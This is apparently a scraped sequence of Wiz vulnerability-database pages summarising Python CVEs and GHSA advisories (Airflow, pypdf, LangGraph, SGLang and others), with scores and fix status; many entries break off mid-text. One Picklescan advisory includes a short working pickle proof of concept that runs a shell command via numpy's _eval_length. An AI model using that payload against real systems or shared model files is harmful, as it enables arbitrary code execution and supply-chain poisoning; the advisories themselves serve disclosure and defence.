Alpine 3.10, 3.11, 3.12, 3.13, 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Mar 20, 2026
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severi
Wiz
GHSA-27jp-wm6q-gp25 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-27jp-wm6q-gp25 Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-27jp-wm6q-gp25 :
Python vulnerability analysis and mitigation
## Summary
The below gist hangs while attempting to format a long list of tuples.
This was found while drafting a regression test for Dja
ngo 5.2's composite primary key feature , which allows querying composite fields with tuples.
Source : NVD
## 6.9
Score
Published February 13, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sqlparse
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Feb 15, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—s
Wiz
CVE-2025-67895 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-67895 [CRITICAL] CVE-2025-67895 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67895 :
Python vulnerability analysis and mitigation
Edge3 Worker RPC RCE on Airflow 2.
This issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2.
The Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do.
If you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider vers
Wiz
CVE-2026-22701 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-22701 [MEDIUM] CVE-2026-22701 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22701 :
Python vulnerability analysis and mitigation
filelock is a platform-independent file lock for Python. Prior to version 3.20.3, a TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. This issue ha
Wiz
CVE-2026-28356 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-28356 [HIGH] CVE-2026-28356 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28356 :
Python vulnerability analysis and mitigation
multipart is a fast multipart/form-data parser for python. Prior to 1.2.2, 1.3.1 and 1.4.0-dev, the parse_options_header() function in multipart.py uses a regular expression with an ambiguous alternation, which can cause exponential backtracking (ReDoS) when parsing maliciously crafted HTTP or multipart segment headers. This can be abused for denial of service (DoS) attacks against web applications using this library to parse request headers or multipart/form-data streams. The issue is fixed in 1.2.2, 1.3.1 and 1.4.0-dev.
Source : NVD
## 7.5
Score
Published March 12, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Chainguard
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
GHSA-5cxw-w2xg-2m8h Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
GHSA-5cxw-w2xg-2m8h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5cxw-w2xg-2m8h :
Python vulnerability analysis and mitigation
## Our assessment
platform
file
platform._follow_symlinks
target = _follow_symlinks(target)
# "file" output is locale dependent: force the usage of the C locale
# to get deterministic behavior.
env = dict(os.environ, LC_ALL='C')
try:
# -b: do not prepend filenames to output lines (brief mode)
output = subprocess.check_output(['file', '-b', target],
stderr=subprocess.DEVNULL,
env=env)
## Original report
## Summary
platform._syscmd_file
platform.architecture
platform.libc_ver
check_safety()
Severity.LIKELY_SAFE
fickling.loads()
subprocess.check_output
['file', '-b', target]
shell=True
file
## Affected versions
<= 0.1.9
## Non-duplication check against published Fickling GHSAs
platform
UNSAF
Wiz
CVE-2026-28804 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-28804 [MEDIUM] CVE-2026-28804 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28804 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.7.5, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires accessing a stream which uses the /ASCIIHexDecode filter. This issue has been patched in version 6.7.5.
Source : NVD
## 6.9
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Chainguard
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python313-PyPDF2
litellm
Sources
NVD
Chainguard Has Fix Added at: Mar 08, 2026
Debian 11, 12,
Wiz
CVE-2026-2970 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.1
CVE-2026-2970 [LOW] CVE-2026-2970 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2970 :
Python vulnerability analysis and mitigation
A vulnerability has been found in datapizza-labs datapizza-ai 0.0.2. Affected by this vulnerability is the function RedisCache of the file datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. Such manipulation leads to deserialization. The attack requires being on the local network. A high complexity level is associated with this attack. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 2.1
Score
Published February 23, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA
Wiz
CVE-2025-67644 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.3
CVE-2025-67644 [HIGH] CVE-2025-67644 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67644 :
Python vulnerability analysis and mitigation
LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1.
Source : NVD
## 7.8
Score
Published December 11, 2025
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Ha
Wiz
CVE-2026-33699 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.6
CVE-2026-33699 [MEDIUM] CVE-2026-33699 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33699 :
Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Versions prior to 6.9.2 have a vulnerability in which an attacker can craft a PDF which leads to an infinite loop. This requires reading a file in non-strict mode. This has been fixed in pypdf 6.9.2. If users cannot upgrade yet, consider applying the changes from the patch manually.
Source : NVD
## 4.6
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pypdf
pypdf2
Sources
NVD
Chainguard Has Fix A
Wiz
CVE-2026-25481 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-25481 [CRITICAL] CVE-2026-25481 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25481 :
Python vulnerability analysis and mitigation
Langroid is a framework for building large-language-model-powered applications. Prior to version 0.59.32, there is a bypass to the fix for CVE-2025-46724. TableChatAgent can call pandas_eval tool to evaluate the expression. There is a WAF in langroid/utils/pandas_utils.py introduced to block code injection CVE-2025-46724. However it can be bypassed due to _literal_ok() returning False instead of raising UnsafeCommandError on invalid input, combined with unrestricted access to dangerous dunder attributes ( init , globals , builtins ). This allows chaining whitelisted DataFrame methods to leak the eval builtin and execute arbitrary code. This issue has been patched in version 0.59.32.
Source : NVD
## 9.4
Score
Published
Wiz
CVE-2025-14692 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-14692 [MEDIUM] CVE-2025-14692 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14692 :
Python vulnerability analysis and mitigation
A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete."
Source : NVD
## 5.3
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
C
Wiz
CVE-2026-29780 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-29780 [MEDIUM] CVE-2026-29780 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29780 :
Python vulnerability analysis and mitigation
eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to version 2.0.1, the official example script examples/recursively_extract_attachments.py contains a path traversal vulnerability that allows arbitrary file write outside the intended output directory. Attachment filenames extracted from parsed emails are directly used to construct output file paths without any sanitization, allowing an attacker-controlled filename to escape the target directory. This issue has been patched in version 2.0.1.
Source : NVD
## 5.5
Score
Published March 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
Has Public Expl
Wiz
CVE-2026-24486 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-24486 [HIGH] CVE-2026-24486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24486 :
Python vulnerability analysis and mitigation
UPLOAD_DIR
UPLOAD_KEEP_FILENAME=True
UPLOAD_KEEP_FILENAME=True
Source : NVD
## 7.5
Score
Published January 27, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
airflow-3
open-webui
Sources
NVD
Alpine 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Feb 18, 2026
Chainguard Has Fix Added at: Jan 28, 2026
Debian 11, 12 Severity MEDIUM No Fix Added at: Jan 27, 2026
Debian 13, 14 Severity HIGH Has Fix Added at: Jan 27, 2026
Echo Severity HIGH Has Fix Added at
Wiz
CVE-2026-21892 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21892 [MEDIUM] CVE-2026-21892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21892 :
Python vulnerability analysis and mitigation
Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue.
Source : NVD
## 7.3
Score
Published January 8, 2026
Severity HIGH
CNA Score 5.3
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
CVE-2025-68472 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2025-68472 [HIGH] CVE-2025-68472 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68472 :
Python vulnerability analysis and mitigation
MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not "url". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1.
Source : NVD
## 9.1
Score
Published January 12, 2026
Severity CRITICAL
CNA Score 8.1
Affected Technologies
Pyt
Wiz
CVE-2025-68616 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-68616 [HIGH] CVE-2025-68616 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68616 :
Python vulnerability analysis and mitigation
default_url_fetcher
localhost
url_fetcher
urllib
Source : NVD
## 7.5
Score
Published January 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
python3-tinycss2
python3-weasyprint
Sources
NVD
Alpine 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Feb 19, 2026
pip Severity HIGH Has Fix Added at: Jan 21, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 20, 2026
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2026-32632 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-32632 [MEDIUM] CVE-2026-32632 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32632 :
Python vulnerability analysis and mitigation
Host
TrustedHostMiddleware
Source : NVD
## 5.9
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 19, 2026
Echo Severity MEDIUM No Fix Added at: Mar 19, 2026
pip Severity MEDIUM Has Fix Added at: Mar 17, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 20, 2026
Nix Severity MEDIUM Has Fix Added at: Mar 20, 2026
## G
Wiz
CVE-2025-68463 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.9
CVE-2025-68463 [MEDIUM] CVE-2025-68463 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68463 :
Python vulnerability analysis and mitigation
Bio.Entrez in Biopython through 186 allows doctype XXE.
Source : NVD
## 4.9
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 4.9
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
python-biopython
python3-biopython
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Dec 21, 2025
Echo Severity MEDIUM No Fix Added at: Dec 21, 2025
pip Severity MEDIUM No Fix Added at: Dec 21, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on wh
Wiz
CVE-2025-69277 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.5
CVE-2025-69277 [MEDIUM] CVE-2025-69277 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69277 :
Python vulnerability analysis and mitigation
libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group.
Source : NVD
## 4.5
Score
Published December 31, 2025
Severity MEDIUM
CNA Score 4.5
Affected Technologies
Python
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pynacl
datadog-agent-7.71
Sources
NVD
Alpine 3.20, 3.21, 3.22, 3.23, edge Severity MEDIUM Has Fix
Wiz
GHSA-6556-fwc2-fg2p Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-6556-fwc2-fg2p Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-6556-fwc2-fg2p :
Python vulnerability analysis and mitigation
## Summary
numpy.f2py.crackfortran._eval_length
## Details
numpy.f2py.crackfortran._eval_length
__reduce__
## PoC
class PoC:
def __reduce__(self):
from numpy.f2py.crackfortran import _eval_length
return _eval_length, ("__import__('os').system('whoami')", None)
## Impact
Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file.
Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.
Enables supply‑chain poisoning of shared model files.
## Credits
ac0d3r
Tong Liu , Institute of information engineering, CAS
Source : NVD
## 6.7
Score
Published December 30, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
P
Wiz
CVE-2026-3059 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-3059 [CRITICAL] CVE-2026-3059 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3059 :
Python vulnerability analysis and mitigation
SGLang's multimodal generation module is vulnerable to unauthenticated remote code execution through the ZMQ broker, which deserializes untrusted data using pickle.loads() without authentication.
Source : NVD
## 9.8
Score
Published March 12, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
SGLang
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 78.5
Exploitation Probability (EPSS) 1.2
Affected packages and libraries
sglang
cpe:2.3:a:lmsys:sglang
Sources
pip Severity CRITICAL No Fix Added at: Mar 12, 2026
Linux Severity CRITICAL No Fix Added at: Apr 02, 2026
Windows Severity CRITICAL No Fix Added a
Wiz
CVE-2026-23968 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2026-23968 [MEDIUM] CVE-2026-23968 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23968 :
Python vulnerability analysis and mitigation
--UNSAFE,--trust
_preserve_symlinks: false
Source : NVD
## 6.8
Score
Published January 21, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
copier
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 22, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 04, 2026
Nix Severity MEDIUM Has Fix Added at: Feb 04, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Pyth
Wiz
CVE-2026-33010 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33010 [HIGH] CVE-2026-33010 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33010 :
Python vulnerability analysis and mitigation
mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.25.1, when the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=[' '], allow_credentials=True, allow_methods=[" "], and allow_headers=["*"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories. This issue has been patched in version 10.25.1.
Source : NVD
## 8
Wiz
CVE-2026-34222 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.7
CVE-2026-34222 [HIGH] CVE-2026-34222 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34222 :
Python vulnerability analysis and mitigation
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, there is a broken access control vulnerability in tool values. This issue has been patched in version 0.8.11.
Source : NVD
## 7.7
Score
Published April 1, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
cpe:2.3:a:openwebui:open_webui
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
Linux Severity HIGH Has Fix Added at: Apr 02
Wiz
CVE-2026-25905 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.8
CVE-2026-25905 [MEDIUM] CVE-2026-25905 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25905 :
Python vulnerability analysis and mitigation
The Python code being run by 'runPython' or 'runPythonAsync' is not isolated from the rest of the JS code, allowing any Python code to use the Pyodide APIs to modify the JS environment. This may result in an attacker hijacking the MCP server - for malicious purposes including MCP tool shadowing. Note - the "mcp-run-python" project is archived and unlikely to receive a fix.
Source : NVD
## 5.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-run-python
So
Wiz
CVE-2026-28222 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28222 [MEDIUM] CVE-2026-28222 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28222 :
Python vulnerability analysis and mitigation
Wagtail is an open source content management system built on Django. Prior to versions 6.3.8, 7.0.6, 7.2.3, and 7.3.1, a stored cross-site scripting (XSS) vulnerability exists on rendering TableBlock blocks within a StreamField. A user with access to create or edit pages containing TableBlock StreamField blocks is able to set specially-crafted class attributes on the block which run arbitrary JavaScript code when the page is viewed. When viewed by a user with higher privileges, this could lead to performing actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin, and only affects sites using TableBlock. This issue has been patched in versions
Wiz
CVE-2025-15504 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2025-15504 [MEDIUM] CVE-2025-15504 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15504 :
Python vulnerability analysis and mitigation
A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 can resolve this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component.
Source : NVD
## 4.8
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Rust
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA
Wiz
CVE-2026-0596 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.6
CVE-2026-0596 [CRITICAL] CVE-2026-0596 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0596 :
Python vulnerability analysis and mitigation
enable_mlserver=True
model_uri
bash -c
model_uri
$()
Source : NVD
## 9.6
Score
Published March 31, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 57.6
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
mflow
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Apr 05, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Python vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Wiz
CVE-2026-29790 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.0
CVE-2026-29790 [LOW] CVE-2026-29790 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29790 :
Python vulnerability analysis and mitigation
dbt-common is the shared common utilities for dbt-core and adapter implementations use. Prior to versions 1.34.2 and 1.37.3, a path traversal vulnerability exists in dbt-common's safe_extract() function used when extracting tarball archives. The function uses os.path.commonprefix() to validate that extracted files remain within the intended destination directory. However, commonprefix() compares paths character-by-character rather than by path components, allowing a malicious tarball to write files to sibling directories with matching name prefixes. This issue has been patched in versions 1.34.2 and 1.37.3.
Source : NVD
## 2
Score
Published March 6, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
Has
Wiz
CVE-2026-30922 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2026-30922 [HIGH] CVE-2026-30922 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30922 :
Python vulnerability analysis and mitigation
pyasn1
SEQUENCE
0x30
SET
0x31
0x80
RecursionError
MAX_OID_ARC_CONTINUATION_OCTETS
Source : NVD
## 7.5
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
CBL Mariner
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
metaflow-service-fips
spamcheck
Sources
NVD
CBL-Mariner 2.0 Severity HIGH Has Fix Added at: Apr 02, 2026
Chainguard Has Fix Added at: Mar 18, 2026
Debian 11 Severity HIGH No Fix Added at: Mar 19, 2026
Debian 12, 13, 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH Has
Wiz
The CVE Database: Curated Vulnerability Intelligence by Wiz | Wiz
blogs_wiz·CVSS 9.8
CVE-2026-35616 [CRITICAL] The CVE Database: Curated Vulnerability Intelligence by Wiz | Wiz
## Wiz Vulnerability Database
A comprehensive resource for monitoring high-profile vulnerabilities in cloud environments, tailored for security teams and cloud professionals
See how Wiz detects exploitable vulnerabilities across cloud workloads. Watch 12-min demo
## Explore by technology
## Popular filters
## High Profile
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
CVE-2026-35616
CRITICAL
9.8
FortiClient EMS
cpe:2.3:a:fortinet:forticlient_enterprise_management_server
Yes
Yes
Apr 04, 2026
GHSA-69fq-xp46-6x23
CRITICAL
9.4
N/A
github.com/aquasecurity/trivy
No
Yes
Mar 24, 2026
CVE-2026-3055
CRITICAL
9.3
Citrix ADC VPX
cpe:2.3:a:citrix:netscaler_application_delivery_controller
Yes
Yes
Mar 23, 2026
CVE-2026-
Wiz
CVE-2026-34955 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-34955 [HIGH] CVE-2026-34955 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34955 :
Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, SubprocessSandbox in all modes (BASIC, STRICT, NETWORK_ISOLATED) calls subprocess.run() with shell=True and relies solely on string-pattern matching to block dangerous commands. The blocklist does not include sh or bash as standalone executables, allowing trivial sandbox escape in STRICT mode via sh -c ' '. This issue has been patched in version 4.5.97.
Source : NVD
## 8.8
Score
Published April 4, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected p
Wiz
CVE-2025-62349 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-62349 [HIGH] CVE-2025-62349 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62349 :
Python vulnerability analysis and mitigation
Salt contains an authentication protocol version downgrade weakness that can allow a malicious minion to bypass newer authentication/security features by using an older request payload format, enabling minion impersonation and circumventing protections introduced in response to prior issues.
Source : NVD
## 7.5
Score
Published January 30, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
SaltStack
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
salt-cloud
salt-proxy
Sources
NVD
Alpine 3.22 Severity MEDIUM Has Fix Added at: Nov 26,
Wiz
CVE-2026-35002 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
